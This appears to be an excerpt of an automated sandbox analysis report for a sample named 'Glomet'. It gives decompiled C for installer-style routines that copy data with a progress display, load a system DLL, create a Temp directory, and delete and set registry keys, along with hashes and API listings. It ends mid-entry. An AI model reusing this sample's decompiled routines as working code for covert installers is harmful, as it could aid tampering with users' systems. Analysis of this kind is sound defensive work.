                                                                                                                                                                              • API String ID: 2531174081-3088349991
                                                                                                                                                                              • Opcode ID: 21f3fbad3f320d21e4f6dada675e32395d1bb8621f14401d727b4391d208c3a9
                                                                                                                                                                              • Instruction ID: bfa893c7d30147700316bd172ea6c956eb0bdb6a7275625f57f4f23b87bde493
                                                                                                                                                                              • Opcode Fuzzy Hash: 21f3fbad3f320d21e4f6dada675e32395d1bb8621f14401d727b4391d208c3a9
                                                                                                                                                                              • Instruction Fuzzy Hash: D7218C71A00518BBDB11AFA5DD84ADFBFB9EF04354F14807AF904B6290C7798E908F98
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                              			E00403143(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                              				int _v12;
                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                              				long _v20;
                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                              				char _v88;
                                                                                                                                                                              				void* _t65;
                                                                                                                                                                              				void* _t69;
                                                                                                                                                                              				long _t70;
                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                              				long _t76;
                                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                                              				void* _t78;
                                                                                                                                                                              				int _t88;
                                                                                                                                                                              				intOrPtr _t92;
                                                                                                                                                                              				intOrPtr _t95;
                                                                                                                                                                              				long _t96;
                                                                                                                                                                              				signed int _t97;
                                                                                                                                                                              				int _t98;
                                                                                                                                                                              				int _t99;
                                                                                                                                                                              				intOrPtr _t100;
                                                                                                                                                                              				void* _t101;
                                                                                                                                                                              				void* _t102;
                                                                                                                                                                              
                                                                                                                                                                              				_t97 = _a16;
                                                                                                                                                                              				_t92 = _a12;
                                                                                                                                                                              				_v12 = _t97;
                                                                                                                                                                              				if(_t92 == 0) {
                                                                                                                                                                              					_v12 = 0x8000;
                                                                                                                                                                              				}
                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                              				_v16 = _t92;
                                                                                                                                                                              				if(_t92 == 0) {
                                                                                                                                                                              					_v16 = 0x421448;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t62 = _a4;
                                                                                                                                                                              				if(_a4 >= 0) {
                                                                                                                                                                              					E0040336B( *0x42f478 + _t62);
                                                                                                                                                                              				}
                                                                                                                                                                              				if(E00403355( &_a16, 4) == 0) {
                                                                                                                                                                              					L41:
                                                                                                                                                                              					_push(0xfffffffd);
                                                                                                                                                                              					goto L42;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					if((_a19 & 0x00000080) == 0) {
                                                                                                                                                                              						if(_t92 != 0) {
                                                                                                                                                                              							if(_a16 < _t97) {
                                                                                                                                                                              								_t97 = _a16;
                                                                                                                                                                              							}
                                                                                                                                                                              							if(E00403355(_t92, _t97) != 0) {
                                                                                                                                                                              								_v8 = _t97;
                                                                                                                                                                              								L44:
                                                                                                                                                                              								return _v8;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								goto L41;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						if(_a16 <= _t92) {
                                                                                                                                                                              							goto L44;
                                                                                                                                                                              						}
                                                                                                                                                                              						_t88 = _v12;
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							_t98 = _a16;
                                                                                                                                                                              							if(_a16 >= _t88) {
                                                                                                                                                                              								_t98 = _t88;
                                                                                                                                                                              							}
                                                                                                                                                                              							if(E00403355(0x41d448, _t98) == 0) {
                                                                                                                                                                              								goto L41;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t69 = E00405E91(_a8, 0x41d448, _t98); // executed
                                                                                                                                                                              							if(_t69 == 0) {
                                                                                                                                                                              								L28:
                                                                                                                                                                              								_push(0xfffffffe);
                                                                                                                                                                              								L42:
                                                                                                                                                                              								_pop(_t65);
                                                                                                                                                                              								return _t65;
                                                                                                                                                                              							}
                                                                                                                                                                              							_v8 = _v8 + _t98;
                                                                                                                                                                              							_a16 = _a16 - _t98;
                                                                                                                                                                              							if(_a16 > 0) {
                                                                                                                                                                              								continue;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L44;
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L41;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t70 = GetTickCount();
                                                                                                                                                                              					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                                                                                                                                              					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                                                                                                                                              					_t14 =  &_a16;
                                                                                                                                                                              					 *_t14 = _a16 & 0x7fffffff;
                                                                                                                                                                              					_v20 = _t70;
                                                                                                                                                                              					 *0x40b890 = 8;
                                                                                                                                                                              					 *0x415438 = 0x40d430;
                                                                                                                                                                              					 *0x415434 = 0x40d430;
                                                                                                                                                                              					 *0x415430 = 0x415430;
                                                                                                                                                                              					_a4 = _a16;
                                                                                                                                                                              					if( *_t14 <= 0) {
                                                                                                                                                                              						goto L44;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						goto L9;
                                                                                                                                                                              					}
                                                                                                                                                                              					while(1) {
                                                                                                                                                                              						L9:
                                                                                                                                                                              						_t99 = 0x4000;
                                                                                                                                                                              						if(_a16 < 0x4000) {
                                                                                                                                                                              							_t99 = _a16;
                                                                                                                                                                              						}
                                                                                                                                                                              						if(E00403355(0x41d448, _t99) == 0) {
                                                                                                                                                                              							goto L41;
                                                                                                                                                                              						}
                                                                                                                                                                              						_a16 = _a16 - _t99;
                                                                                                                                                                              						 *0x40b880 = 0x41d448;
                                                                                                                                                                              						 *0x40b884 = _t99;
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							_t95 = _v16;
                                                                                                                                                                              							 *0x40b888 = _t95;
                                                                                                                                                                              							 *0x40b88c = _v12;
                                                                                                                                                                              							_t75 = E00406788("0\xef\xbf							_v24 = _t75;
                                                                                                                                                                              							if(_t75 < 0) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t100 =  *0x40b888; // 0x422e48
                                                                                                                                                                              							_t101 = _t100 - _t95;
                                                                                                                                                                              							_t76 = GetTickCount();
                                                                                                                                                                              							_t96 = _t76;
                                                                                                                                                                              							if(( *0x42f4d4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                                                                                                              								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                                                                                                              								_t102 = _t102 + 0xc;
                                                                                                                                                                              								E00405378(0,  &_v88); // executed
                                                                                                                                                                              								_v20 = _t96;
                                                                                                                                                                              							}
                                                                                                                                                                              							if(_t101 == 0) {
                                                                                                                                                                              								if(_a16 > 0) {
                                                                                                                                                                              									goto L9;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L44;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								if(_a12 != 0) {
                                                                                                                                                                              									_t77 =  *0x40b888; // 0x422e48
                                                                                                                                                                              									_v8 = _v8 + _t101;
                                                                                                                                                                              									_v12 = _v12 - _t101;
                                                                                                                                                                              									_v16 = _t77;
                                                                                                                                                                              									L23:
                                                                                                                                                                              									if(_v24 != 1) {
                                                                                                                                                                              										continue;
                                                                                                                                                                              									}
                                                                                                                                                                              									goto L44;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t78 = E00405E91(_a8, _v16, _t101); // executed
                                                                                                                                                                              								if(_t78 == 0) {
                                                                                                                                                                              									goto L28;
                                                                                                                                                                              								}
                                                                                                                                                                              								_v8 = _v8 + _t101;
                                                                                                                                                                              								goto L23;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						_push(0xfffffffc);
                                                                                                                                                                              						goto L42;
                                                                                                                                                                              					}
                                                                                                                                                                              					goto L41;
                                                                                                                                                                              				}
                                                                                                                                                                              			}


























                                                                                                                                                                              0x004031ba
                                                                                                                                                                              0x004031c1
                                                                                                                                                                              0x004031c9
                                                                                                                                                                              0x004031d3
                                                                                                                                                                              0x004031d8
                                                                                                                                                                              0x004031e0
                                                                                                                                                                              0x004031ea
                                                                                                                                                                              0x004031ed
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031f3
                                                                                                                                                                              0x004031fb
                                                                                                                                                                              0x004031fd
                                                                                                                                                                              0x004031fd
                                                                                                                                                                              0x0040320e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403214
                                                                                                                                                                              0x00403217
                                                                                                                                                                              0x0040321d
                                                                                                                                                                              0x00403223
                                                                                                                                                                              0x00403223
                                                                                                                                                                              0x0040322e
                                                                                                                                                                              0x00403234
                                                                                                                                                                              0x00403239
                                                                                                                                                                              0x00403240
                                                                                                                                                                              0x00403243
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403249
                                                                                                                                                                              0x0040324f
                                                                                                                                                                              0x00403251
                                                                                                                                                                              0x0040325a
                                                                                                                                                                              0x0040325c
                                                                                                                                                                              0x0040328a
                                                                                                                                                                              0x00403290
                                                                                                                                                                              0x00403299
                                                                                                                                                                              0x0040329e
                                                                                                                                                                              0x0040329e
                                                                                                                                                                              0x004032a3
                                                                                                                                                                              0x004032de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032a5
                                                                                                                                                                              0x004032a9
                                                                                                                                                                              0x004032c0
                                                                                                                                                                              0x004032c5
                                                                                                                                                                              0x004032c8
                                                                                                                                                                              0x004032cb
                                                                                                                                                                              0x004032ce
                                                                                                                                                                              0x004032d2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032d8
                                                                                                                                                                              0x004032b2
                                                                                                                                                                              0x004032b9
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032bb
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032bb
                                                                                                                                                                              0x004032a3
                                                                                                                                                                              0x004032e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004032e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004031f3

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CountTick$wsprintf
                                                                                                                                                                              • String ID: ... %d%%$0A$H.B
                                                                                                                                                                              • API String ID: 551687249-3873104639
                                                                                                                                                                              • Opcode ID: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                                                                                                                              • Instruction ID: cc32688fb846b20799601ecf4724bdf5f6a604bb501928ae6cb5e0d1b862edc2
                                                                                                                                                                              • Opcode Fuzzy Hash: ede1e8e15d747a91ca4de53f89313a3819b99860a5cad6c8dedb11164fc401f9
                                                                                                                                                                              • Instruction Fuzzy Hash: 10517C71800219ABDB10DFA5DA8469F7BB8EF44766F14817BEC41B72D0C7389A50CBA9
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 718 4065f5-406615 GetSystemDirectoryA 719 406617 718->719 720 406619-40661b 718->720 719->720 721 40662b-40662d 720->721 722 40661d-406625 720->722 724 40662e-406660 wsprintfA LoadLibraryExA 721->724 722->721 723 406627-406629 722->723 723->724
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004065F5(intOrPtr _a4) {
                                                                                                                                                                              				char _v292;
                                                                                                                                                                              				int _t10;
                                                                                                                                                                              				struct HINSTANCE__* _t14;
                                                                                                                                                                              				void* _t16;
                                                                                                                                                                              				void* _t21;
                                                                                                                                                                              
                                                                                                                                                                              				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                                                                                                              				if(_t10 > 0x104) {
                                                                                                                                                                              					_t10 = 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                                                                                                              					_t16 = 1;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                                                                                                              				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                                                                                                              				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                                                                                                              				return _t14;
                                                                                                                                                                              			}









                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemDirectoryA.KERNEL32 ref: 0040660C
                                                                                                                                                                              • wsprintfA.USER32 ref: 00406645
                                                                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                                                              • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                                              • Instruction ID: 9f789840e0b15416ae64874b5c60068ae2f650887ed5db1015d4ebb1f4ad26b2
                                                                                                                                                                              • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                                              • Instruction Fuzzy Hash: 12F0213051060A67DB14A764DD0DFFB3B5CEB08304F14047EA586F10C1DAB9D5358B5D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 725 40583e-405889 CreateDirectoryA 726 40588b-40588d 725->726 727 40588f-40589c GetLastError 725->727 728 4058b6-4058b8 726->728 727->728 729 40589e-4058b2 SetFileSecurityA 727->729 729->726 730 4058b4 GetLastError 729->730 730->728
                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040583E(CHAR* _a4) {
                                                                                                                                                                              				struct _SECURITY_ATTRIBUTES _v16;
                                                                                                                                                                              				struct _SECURITY_DESCRIPTOR _v36;
                                                                                                                                                                              				int _t22;
                                                                                                                                                                              				long _t23;
                                                                                                                                                                              
                                                                                                                                                                              				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                                                                                                              				_v36.Owner = 0x408384;
                                                                                                                                                                              				_v36.Group = 0x408384;
                                                                                                                                                                              				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                                                                                                              				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                                                                                                              				_v16.lpSecurityDescriptor =  &_v36;
                                                                                                                                                                              				_v36.Revision = 1;
                                                                                                                                                                              				_v36.Control = 4;
                                                                                                                                                                              				_v36.Dacl = 0x408374;
                                                                                                                                                                              				_v16.nLength = 0xc;
                                                                                                                                                                              				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                                                                                                              				if(_t22 != 0) {
                                                                                                                                                                              					L1:
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t23 = GetLastError();
                                                                                                                                                                              				if(_t23 == 0xb7) {
                                                                                                                                                                              					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                                                                                                              						goto L1;
                                                                                                                                                                              					}
                                                                                                                                                                              					return GetLastError();
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t23;
                                                                                                                                                                              			}








                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,0000000B,C:\Users\user\AppData\Local\Temp\), ref: 00405881
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00405895
                                                                                                                                                                              • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004058B4
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405864
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                              • API String ID: 3449924974-3916508600
                                                                                                                                                                              • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                                              • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                                                                                                                                              • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                                                                                                              • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 731 402d3b-402d64 call 4060dd 733 402d69-402d6d 731->733 734 402d73-402d77 733->734 735 402e1e-402e22 733->735 736 402d79-402d9a RegEnumValueA 734->736 737 402d9c-402daf 734->737 736->737 738 402e03-402e11 RegCloseKey 736->738 739 402dd8-402ddf RegEnumKeyA 737->739 738->735 740 402db1-402db3 739->740 741 402de1-402df3 RegCloseKey call 406663 739->741 740->738 743 402db5-402dc9 call 402d3b 740->743 747 402e13-402e19 741->747 748 402df5-402e01 RegDeleteKeyA 741->748 743->741 749 402dcb-402dd7 743->749 747->735 748->735 749->739
                                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                                              			E00402D3B(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                                                                                                              				void* _v8;
                                                                                                                                                                              				int _v12;
                                                                                                                                                                              				char _v276;
                                                                                                                                                                              				void* _t27;
                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                              
                                                                                                                                                                              				_t46 = _a12;
                                                                                                                                                                              				_t47 = _t46 & 0x00000300;
                                                                                                                                                                              				_t45 = _t46 & 0x00000001;
                                                                                                                                                                              				_t27 = E004060DD(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                                                                                                                              				if(_t27 == 0) {
                                                                                                                                                                              					if((_a12 & 0x00000002) == 0) {
                                                                                                                                                                              						L3:
                                                                                                                                                                              						_push(0x105);
                                                                                                                                                                              						_push( &_v276);
                                                                                                                                                                              						_push(0);
                                                                                                                                                                              						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                              								L10:
                                                                                                                                                                              								RegCloseKey(_v8);
                                                                                                                                                                              								return 0x3eb;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t33 = E00402D3B(__eflags, _v8,  &_v276, _a12);
                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							_push(0x105);
                                                                                                                                                                              							_push( &_v276);
                                                                                                                                                                              							_push(_t45);
                                                                                                                                                                              						}
                                                                                                                                                                              						RegCloseKey(_v8);
                                                                                                                                                                              						_t35 = E00406663(3);
                                                                                                                                                                              						if(_t35 != 0) {
                                                                                                                                                                              							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                                                                              						}
                                                                                                                                                                              						return RegDeleteKeyA(_a4, _a8);
                                                                                                                                                                              					}
                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                              					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                                                                              						goto L10;
                                                                                                                                                                              					}
                                                                                                                                                                              					goto L3;
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t27;
                                                                                                                                                                              			}


                                                                                                                                                                              APIs
                                                                                                                                                                              • RegEnumValueA.ADVAPI32 ref: 00402D8F
                                                                                                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DDB
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE4
                                                                                                                                                                              • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402DFB
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E06
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1354259210-0
                                                                                                                                                                              • Opcode ID: d3065a1495d08a70ee0ec73ce03137b35b959529f7d494a5279a47c727d8abac
                                                                                                                                                                              • Instruction ID: d48e4a71bfa48a15fd7248f9ae3dc224302ba9e6f67c9eaa91d5645e55e2e307
                                                                                                                                                                              • Opcode Fuzzy Hash: d3065a1495d08a70ee0ec73ce03137b35b959529f7d494a5279a47c727d8abac
                                                                                                                                                                              • Instruction Fuzzy Hash: D9213771500108BADF129F90CE89EEB7B7DEF44344F10047AFA15B11A0D7B49EA4AAA8
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              control_flow_graph 750 40247e-4024af call 402c39 * 2 call 402cc9 757 402ac5-402ad4 750->757 758 4024b5-4024bf 750->758 760 4024c1-4024ce call 402c39 lstrlenA 758->760 761 4024cf-4024d2 758->761 760->761 762 4024d4-4024e8 call 402c17 761->762 763 4024e9-4024ec 761->763 762->763 768 4024fd-402511 RegSetValueExA 763->768 769 4024ee-4024f8 call 403143 763->769 772 402513 768->772 773 402516-4025f3 RegCloseKey 768->773 769->768 772->773 773->757
                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                              			E0040247E(void* __eax, int __ebx, intOrPtr __edx) {
                                                                                                                                                                              				void* _t18;
                                                                                                                                                                              				void* _t19;
                                                                                                                                                                              				int _t22;
                                                                                                                                                                              				long _t23;
                                                                                                                                                                              				int _t28;
                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                              				void* _t32;
                                                                                                                                                                              				intOrPtr _t35;
                                                                                                                                                                              				void* _t37;
                                                                                                                                                                              				void* _t40;
                                                                                                                                                                              
                                                                                                                                                                              				_t31 = __edx;
                                                                                                                                                                              				_t28 = __ebx;
                                                                                                                                                                              				_t35 =  *((intOrPtr*)(_t37 - 0x18));
                                                                                                                                                                              				_t32 = __eax;
                                                                                                                                                                              				 *(_t37 - 0x38) =  *(_t37 - 0x14);
                                                                                                                                                                              				 *(_t37 - 0x78) = E00402C39(2);
                                                                                                                                                                              				_t18 = E00402C39(0x11);
                                                                                                                                                                              				 *(_t37 - 4) = 1;
                                                                                                                                                                              				_t19 = E00402CC9(_t40, _t32, _t18, 2); // executed
                                                                                                                                                                              				 *(_t37 + 8) = _t19;
                                                                                                                                                                              				if(_t19 != __ebx) {
                                                                                                                                                                              					_t22 = 0;
                                                                                                                                                                              					if(_t35 == 1) {
                                                                                                                                                                              						E00402C39(0x23);
                                                                                                                                                                              						_t22 = lstrlenA(0x40ac38) + 1;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t35 == 4) {
                                                                                                                                                                              						 *0x40ac38 = E00402C17(3);
                                                                                                                                                                              						 *((intOrPtr*)(_t37 - 0x88)) = _t31;
                                                                                                                                                                              						_t22 = _t35;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_t35 == 3) {
                                                                                                                                                                              						_t22 = E00403143( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40ac38, 0xc00);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x78), _t28,  *(_t37 - 0x38), 0x40ac38, _t22); // executed
                                                                                                                                                                              					if(_t23 == 0) {
                                                                                                                                                                              						 *(_t37 - 4) = _t28;
                                                                                                                                                                              					}
                                                                                                                                                                              					_push( *(_t37 + 8));
                                                                                                                                                                              					RegCloseKey();
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}


                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000023,00000011,00000002), ref: 004024C9
                                                                                                                                                                              • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 00402509
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsb11EA.tmp,00000000,00000011,00000002), ref: 004025ED
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseValuelstrlen
                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsb11EA.tmp
                                                                                                                                                                              • API String ID: 2655323295-3428060773
                                                                                                                                                                              • Opcode ID: e7bab2dcec296759a74a33424807f7fed87e27b7007b4ae7814fd3a0996a0b2c
                                                                                                                                                                              • Instruction ID: f3aadfd2260b8f93e823aa7e7f88ba76dab9d069632aeea64c5940af2cf5b862
